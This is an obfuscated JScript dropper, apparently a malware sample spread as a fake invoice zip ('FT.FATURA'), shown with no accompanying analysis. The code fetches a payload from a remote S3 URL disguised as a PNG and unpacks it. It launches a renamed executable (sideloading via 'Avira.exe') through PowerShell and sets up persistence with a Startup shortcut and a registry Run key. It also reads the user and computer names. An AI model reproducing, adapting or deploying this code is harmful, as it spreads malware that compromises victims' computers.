FT.FATURA.ERKUNSWPAZIDNQJURBDPG.zip

1. _0x150f = ['HKCU\software\Microsoft\Windows\CurrentVersion\Run', 'Start-Sleep -s 60;Invoke-Item ', 'powershell.exe cd\;cd ', 'FolderExists', 'https://hipermercado.s3-sa-east-1.amazonaws.com/bretas.png', 'winmgmts: {  impersonationLevel=impersonate}/./root/default:StdRegProv', '.bmp', 'zip', '..com..exe..exe', '143981hnmxmp', 'length', 'replace', 'ABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚABCDEFGHIJLMNOPQRSTUVXZWKYÇÃÉÁÍÓÚÕÚ', 'WorkingDirectory', 'CopyHere', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'MoveFile', 'Hotkey', 'close', 'UserName', '\Documents', 'charAt', 'getFolder', '929288uncNII', 'Save', 'type', 'ABCDEFGHIJLMNOPQRSTVXZWKY', 'saveToFile', 'Shell.Application', 'GET', 'send', 'FileExists', '.lnk', '319714vmPnfG', 'WScript.Shell', 'DeleteFile', '409000NRQoch', 'Position', '352816eNyfiH', '1eWRofM', 'open', '\*.lnk', 'TargetPath', 'rundll32.exe', 'Run', 'SpecialFolders', 'expandenvironmentstrings', '117637nwofHY', 'CreateFolder', 'REG_SZ', 'Description', 'NameSpace', 'MoveFolder', 'RegWrite', 'floor', 'ABCDEFGHIJLMNOPQRSTUVXZWKY', 'responseBody', 'Items', ' @ W i n H t t p . W i n H t t p R e q u e s t . 5 . 1 @ ', '1GzCfLO', '', 'random', 'CreateShortcut', 'write', ' @ p u b l i c @ ', 'Path', '317619ALeOcQ'];
2. var _0x1771 = function(_0x515f7e, _0x122f34)  {
3.       _0x515f7e = _0x515f7e - 0x85;
4.       var _0x150f71 = _0x150f[_0x515f7e];
5.       return _0x150f71;
6.  
7. };
8. var _0x2cfef8 = _0x1771;
9. (function(_0x2ad673, _0x15665b)  {
10.       var _0x235709 = _0x1771;    while (!![])  {
11.             try  {
12.                   var _0x4733ac = parseInt(_0x235709(0xc6)) + -parseInt(_0x235709(0xc7)) * parseInt(_0x235709(0xa9)) + parseInt(_0x235709(0x98)) * parseInt(_0x235709(0x8c)) + -parseInt(_0x235709(0x9f)) + -parseInt(_0x235709(0xc4)) + -parseInt(_0x235709(0xc1)) + parseInt(_0x235709(0xb7));            if (_0x4733ac === _0x15665b) break;            else _0x2ad673['push'](_0x2ad673['shift']());        
13.     }
14.      catch (_0x5f30d7)  {
15.                   _0x2ad673['push'](_0x2ad673['shift']());        
16.     }
17.        
18.   }
19.  
20. }
21.  
22. (_0x150f, 0x33213));
23. var CIF5QTNOFKZ = _0x2cfef8(0xa4),    C2IBEO6AEZU = '',    COK7ZHYJUNV = _0x2cfef8(0xb4),    CJIGUQBIZMA = _0x2cfef8(0x9d) + COK7ZHYJUNV,    CCZQNDWCXO7 = _0x2cfef8(0x99),    CFJPMCL7AEG = '',    CXVUAYDQAOX = '',    CL79PXZWYXB = 'wscript.shell',    CZC85F7AYW9 = _0x2cfef8(0xbc),    C907JPHCYY5 = _0x2cfef8(0x97),    CLG5QKHFYB1 = 'scripting.filesystemobject',    CVOI2IDSNAI = _0x2cfef8(0xbd),    CGVGGTPUMCE = 'Adodb.Stream',    keynum = _0x2cfef8(0x94),    CTRFN2PXMEA = _0x2cfef8(0xba),    CTRFN2PXMEA2 = _0x2cfef8(0xac),    C39IWNL8KCT = _0x2cfef8(0x94),    keyfolderlist = _0x2cfef8(0x94),    keyext = '',    CEEHDXXAKEP = '',    i = 0x0,    CZBJIHIF8OD = _0x2cfef8(0xa0),    CVIMYZPVDWX = 'C:\Windows\System32\cmd.exe@/k@cd\@&@cd@',    C935KOYEAEH = '',    CATUVQTPLEC = _0x2cfef8(0x88),    CLAWXAPA8DV = 'Avira.exe',    CDLOMW8GHKE = _0x2cfef8(0xa7),    CJIGUQBIZMA = CJIGUQBIZMA['replace'](/@/g, '%');CJIGUQBIZMA = CJIGUQBIZMA['replace'](/ /g, '');var C907JPHCYY5 = C907JPHCYY5[_0x2cfef8(0xab)](/@/g, '');C907JPHCYY5 = C907JPHCYY5[_0x2cfef8(0xab)](/ /g, '');var C1TMZ5RJ7ZB = new ActiveXObject(CL79PXZWYXB),    pshell = new ActiveXObject(CL79PXZWYXB),    CZ7XBLKD8FR = new ActiveXObject(CLG5QKHFYB1),    C7P0OVXQVE9 = new ActiveXObject(CZC85F7AYW9),    CPNXEGSNLDG = new ActiveXObject(CL79PXZWYXB),    network = new ActiveXObject('WScript.Network'),    userpc = network[_0x2cfef8(0xb3)],    namepc = network['computerName'],    userCEOMCJEBKEY = namepc + ' ' + userpc,    CEOMCJEBKEYuser = userpc + ' ' + namepc;CJIGUQBIZMA = C1TMZ5RJ7ZB[_0x2cfef8(0x8b)](CJIGUQBIZMA) + '\', CJIGUQBIZMA = CJIGUQBIZMA[_0x2cfef8(0xab)](/\/g, '@'), CJIGUQBIZMA = CJIGUQBIZMA[_0x2cfef8(0xab)](/@/g, '\' + '\');
24.  
25. function CGAJQSGKQFO(_0x1225b7)  {
26.      var _0x22517e = _0x2cfef8,        _0x4058c7 = '';    for (i = 0x0; i < _0x1225b7; i++)  {
27.            _0x4058c7 += CTRFN2PXMEA['charAt'](Math[_0x22517e(0x93)](Math[_0x22517e(0x9a)]() * CTRFN2PXMEA[_0x22517e(0xaa)]));    
28.  }
29.      return _0x4058c7;
30. }
31.  
32.  
33.  
34. function CGAJQSGKQFO2(_0x3da8b2)  {
35.      var _0x10c98f = _0x2cfef8,        _0x1d6c09 = '';    for (i = 0x0; i < _0x3da8b2; i++)  {
36.            _0x1d6c09 += CTRFN2PXMEA2[_0x10c98f(0xb5)](Math[_0x10c98f(0x93)](Math[_0x10c98f(0x9a)]() * CTRFN2PXMEA2['length']));    
37.  }
38.      return _0x1d6c09;
39. }
40.  
41.  
42.  
43. function C1LHGDGJCPW(_0x5da6cc)  {
44.      var _0x8f82f1 = _0x2cfef8;    CEEHDXXAKEP = '';    for (i = 0x0; i < _0x5da6cc; i++)  {
45.            CEEHDXXAKEP += C39IWNL8KCT['charAt'](Math['floor'](Math[_0x8f82f1(0x9a)]() * C39IWNL8KCT[_0x8f82f1(0xaa)]));    
46.  }
47.      return CEEHDXXAKEP;
48. }
49.  
50.  
51.  
52. function gpastas(_0x304876)  {
53.      var _0x282f00 = _0x2cfef8,        _0x3546af = '';    for (i = 0x0; i < _0x304876; i++)  {
54.            _0x3546af += keyfolderlist[_0x282f00(0xb5)](Math[_0x282f00(0x93)](Math[_0x282f00(0x9a)]() * keyfolderlist['length']));    
55.  }
56.      return _0x3546af;
57. }
58.  
59.  
60.  
61. function ext(_0x1c28cf)  {
62.      var _0x22a853 = _0x2cfef8,        _0x81ea8a = '';    for (i = 0x0; i < _0x1c28cf; i++)  {
63.            _0x81ea8a += keyext[_0x22a853(0xb5)](Math['floor'](Math[_0x22a853(0x9a)]() * keyext[_0x22a853(0xaa)]));    
64.  }
65.      return _0x81ea8a;
66. }
67.  
68.  
69.  
70. function enumera(_0x457496)  {
71.      var _0x57892a = _0x2cfef8,        _0x20d220 = '';    for (i = 0x0; i < _0x457496; i++)  {
72.            _0x20d220 += keynum[_0x57892a(0xb5)](Math[_0x57892a(0x93)](Math[_0x57892a(0x9a)]() * keynum[_0x57892a(0xaa)]));    
73.  }
74.      return _0x20d220;
75. }
76.  
77. var idcopia = CGAJQSGKQFO(0x1),    CIL8TEXSUF5 = C1LHGDGJCPW(0x1),    CFJPMCL7AEG = CGAJQSGKQFO(0xa),    CBBUQPGHJXD = new ActiveXObject(CL79PXZWYXB),    china = new ActiveXObject(_0x2cfef8(0xc2)),    strDesktop = china[_0x2cfef8(0x8a)]('Startup'),    idnova = gpastas(0x4) + '' + gpastas(0x6) + '' + gpastas(0xa),    idstart1 = 'u' + gpastas(0xa),    CXVUAYDQAOX = CJIGUQBIZMA + idnova + '' + ext(0xa);C935KOYEAEH = CGAJQSGKQFO2(0x23) + _0x2cfef8(0xa8);var CEOMCJEBKEY = CFJPMCL7AEG + '_',    CWE704QBPU9 = CFJPMCL7AEG;CWE704QBPU9 = CWE704QBPU9[_0x2cfef8(0xab)](/ /g, ''), CIF5QTNOFKZ = CIF5QTNOFKZ[_0x2cfef8(0xab)](//g, ''), C2IBEO6AEZU = C2IBEO6AEZU[_0x2cfef8(0xab)](//g, ''), CZBJIHIF8OD = CZBJIHIF8OD[_0x2cfef8(0xab)](//g, ''), C935KOYEAEH = C935KOYEAEH[_0x2cfef8(0xab)](//g, ''), CVIMYZPVDWX = CVIMYZPVDWX[_0x2cfef8(0xab)](//g, ''), CVIMYZPVDWX = CVIMYZPVDWX[_0x2cfef8(0xab)](/@/g, ' ');var CFQHYIRYLS3 = CEOMCJEBKEY + CWE704QBPU9 + '_' + CFJPMCL7AEG + '.' + CDLOMW8GHKE,    CGIWUI9K9F9 = CFQHYIRYLS3;CVIMYZPVDWX = '';var CPCJBDPFLY9 = CVIMYZPVDWX + strDesktop + '\' + CFJPMCL7AEG + _0x2cfef8(0xc0);CPCJBDPFLY9 = CPCJBDPFLY9['replace'](//g, ''), CPCJBDPFLY9 = CPCJBDPFLY9['replace'](/@/g, ' '), CPCJBDPFLY9 = CPCJBDPFLY9[_0x2cfef8(0xab)]('\\', '@'), CPCJBDPFLY9 = CPCJBDPFLY9[_0x2cfef8(0xab)]('\\', '@'), CPCJBDPFLY9 = CPCJBDPFLY9[_0x2cfef8(0xab)]('\\', '@'), CPCJBDPFLY9 = CPCJBDPFLY9[_0x2cfef8(0xab)]('\\', '@'), CPCJBDPFLY9 = CPCJBDPFLY9[_0x2cfef8(0xab)]('@', '\'), CPCJBDPFLY9 = CPCJBDPFLY9['replace']('@', '\'), CPCJBDPFLY9 = CPCJBDPFLY9[_0x2cfef8(0xab)]('@', '\'), CPCJBDPFLY9 = CPCJBDPFLY9['replace']('@', '\');var HKEY_CURRENT_USER = 0x80000001,    stdRegPro = _0x2cfef8(0xa5),    objReg = GetObject(stdRegPro),    strKeyPath = _0x2cfef8(0xaf);objReg['DeleteKey'](HKEY_CURRENT_USER, strKeyPath);var CVXUU5DR7Q2 = new ActiveXObject(CL79PXZWYXB);CVXUU5DR7Q2[_0x2cfef8(0x92)](CZBJIHIF8OD + '\' + CFJPMCL7AEG + '', '' + CPCJBDPFLY9 + '', _0x2cfef8(0x8e));try  {
78.      CZ7XBLKD8FR[_0x2cfef8(0xc3)](strDesktop + _0x2cfef8(0x86));
79. }
80.  
81. catch (_0x4ed379)  {}var oShellLink = china[_0x2cfef8(0x9b)](strDesktop + '\' + CFJPMCL7AEG + '.lnk');oShellLink[_0x2cfef8(0x87)] = CXVUAYDQAOX + '\' + C935KOYEAEH, oShellLink['WindowStyle'] = 0x1, oShellLink[_0x2cfef8(0xb1)] = '', oShellLink[_0x2cfef8(0x8f)] = '', oShellLink[_0x2cfef8(0xad)] = strDesktop, oShellLink[_0x2cfef8(0xb8)]();
82.  
83. function CRCJB9L754C(_0x4bcf82, _0x378240)  {
84.      var _0x5f30f2 = _0x2cfef8;    try  {
85.            var _0x546d2c = new ActiveXObject(CLG5QKHFYB1),            _0x15f3f9 = new ActiveXObject(CZC85F7AYW9),            _0x37d08e, _0x2d8d5c;        !_0x378240 && (_0x378240 = '.');        !_0x546d2c[_0x5f30f2(0xa3)](_0x378240) && _0x546d2c[_0x5f30f2(0x8d)](_0x378240);        _0x37d08e = _0x15f3f9[_0x5f30f2(0x90)](_0x546d2c[_0x5f30f2(0xb6)](_0x378240)[_0x5f30f2(0x9e)]), _0x2d8d5c = _0x15f3f9[_0x5f30f2(0x90)](_0x546d2c['getFile'](_0x4bcf82)['Path']);        if (_0x546d2c[_0x5f30f2(0xbf)](_0x4bcf82))  {
86.                  _0x37d08e[_0x5f30f2(0xae)](_0x2d8d5c[_0x5f30f2(0x96)](), 0x4 + 0x10), _0x546d2c['DeleteFile'](_0x4bcf82), _0x546d2c[_0x5f30f2(0xb0)](_0x378240 + '\' + CLAWXAPA8DV, _0x378240 + '\' + C935KOYEAEH), _0x546d2c['MoveFile'](_0x378240 + '\' + CATUVQTPLEC, _0x378240 + '\' + CFJPMCL7AEG + _0x5f30f2(0xa6)), _0x546d2c[_0x5f30f2(0x91)](_0x378240, CXVUAYDQAOX);            var _0x138f42 = _0x5f30f2(0xa2) + ''' + strDesktop + ''' + ';' + _0x5f30f2(0xa1) + ''' + CFJPMCL7AEG + _0x5f30f2(0xc0) + ''';            C1TMZ5RJ7ZB[_0x5f30f2(0x89)](_0x138f42, 0x0, ![]);        
87.    }
88.        
89.  }
90.   catch (_0x392f94)  {}
91. }
92.  
93. try  {
94.      var CQXUKOWEUBT = new ActiveXObject(C907JPHCYY5);    CQXUKOWEUBT[_0x2cfef8(0x85)](CVOI2IDSNAI, CIF5QTNOFKZ + C2IBEO6AEZU, ![]), CQXUKOWEUBT[_0x2cfef8(0xbe)]();
95. }
96.  
97. catch (_0x42ab0e)  {}try  {
98.      var CGRKWFQW33B = new ActiveXObject(CGVGGTPUMCE);    CGRKWFQW33B[_0x2cfef8(0x85)](), CGRKWFQW33B[_0x2cfef8(0xb9)] = 0x1, CGRKWFQW33B[_0x2cfef8(0x9c)](CQXUKOWEUBT[_0x2cfef8(0x95)]), CGRKWFQW33B[_0x2cfef8(0xc5)] = 0x0, CGRKWFQW33B[_0x2cfef8(0xbb)](CJIGUQBIZMA + CFQHYIRYLS3, 0x2), CGRKWFQW33B[_0x2cfef8(0xb2)](), CRCJB9L754C(CJIGUQBIZMA + CFQHYIRYLS3, CJIGUQBIZMA + CFJPMCL7AEG);
99. }
100.  
101. catch (_0x5e8d50)  {}
102.